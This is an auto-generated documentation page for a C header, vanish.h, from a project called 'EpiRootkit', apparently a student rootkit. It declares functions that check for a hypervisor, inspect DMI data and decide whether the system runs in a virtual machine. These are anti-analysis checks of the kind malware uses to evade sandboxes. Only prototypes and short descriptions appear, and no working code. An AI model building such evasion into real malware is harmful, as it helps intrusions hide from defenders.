EpiRootkit
By STDBOOL
Loading...
Searching...
No Matches
vanish.h
Go to the documentation of this file.
1#ifndef VANISH_H
2#define VANISH_H
3
4#include <linux/types.h>
5
6bool check_hypervisor(void);
7bool check_dmi(void);
9
10#endif // VANISH_H
bool check_hypervisor(void)
Checks if the system is running under a hypervisor.
Definition vanish.c:16
bool is_running_in_virtual_env(void)
Determines if the system is running in a virtualized environment.
Definition vanish.c:55
bool check_dmi(void)
Checks if the system is running in a known virtualized environment.
Definition vanish.c:29